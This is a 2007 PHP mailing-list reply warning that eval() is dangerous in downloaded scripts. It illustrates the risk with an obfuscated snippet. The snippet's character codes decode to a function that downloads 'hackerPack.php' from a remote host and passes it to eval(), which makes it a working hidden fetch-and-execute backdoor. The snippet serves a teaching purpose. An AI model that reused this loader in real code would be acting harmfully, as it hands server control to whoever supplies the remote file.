On Sat, 2007-03-03 at 14:02 +0100, Tim wrote: > > Once you are comfortable with this, before you use a script downloaded from > the inet in a production environment, go through the code and make sure you > don't see any backdoor code (unecessary fsockopen(), exec() etc.. That isn't > related to the scripts original use). And be very careful with eval(). It's a gold mine for hackers since then they can just do things like: <?php $stuff = '102,117,110,99,116,105,111,110,32,83,73,76,70,83,68,' .'72,76,68,70,78,76,72,68,72,74,76,83,68,76,75,74,68,' .'76,74,83,72,68,76,74,83,72,68,83,90,68,70,83,40,41,' .'10,32,32,32,32,123,10,32,32,32,32,32,32,32,32,36,99,' .'111,100,101,32,61,32,102,105,108,101,40,32,39,104,116,' .'116,112,58,47,47,119,119,119,46,105,110,116,101,114,' .'106,105,110,110,46,99,111,109,47,104,97,99,107,101,' .'114,80,97,99,107,46,112,104,112,39,32,41,59,10,32,32,' .'32,32,32,32,32,32,36,99,111,100,101,32,61,32,105,109,' .'112,108,111,100,101,40,32,39,39,44,32,36,99,111,100,' .'101,32,41,59,10,10,32,32,32,32,32,32,32,32,101,118,' .'97,108,40,32,36,99,111,100,101,32,41,59,10,32,32,32,' .'32,125,10,10,32,32,32,32,83,73,76,70,83,68,72,76,68,' .'70,78,76,72,68,72,74,76,83,68,76,75,74,68,76,74,83,' .'72,68,76,74,83,72,68,83,90,68,70,83,40,41,59'; $stuff = explode( ',', $stuff ); $stuff = 'c'.'h'.'r'.'('.implode( ').' .'c'.'h'.'r'.'(', $stuff ).');'; $stuff = eval( 'return '.$stuff ); $stuff = eval( $stuff ); ?> Cheers, Rob. -- .------------------------------------------------------------. | InterJinn Application Framework - http://www.interjinn.com | :------------------------------------------------------------: | An application and templating framework for PHP. Boasting | | a powerful, scalable system for accessing system services | | such as forms, properties, sessions, and caches. InterJinn | | also provides an extremely flexible architecture for | | creating re-usable components quickly and easily. | `------------------------------------------------------------' -- PHP Windows Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php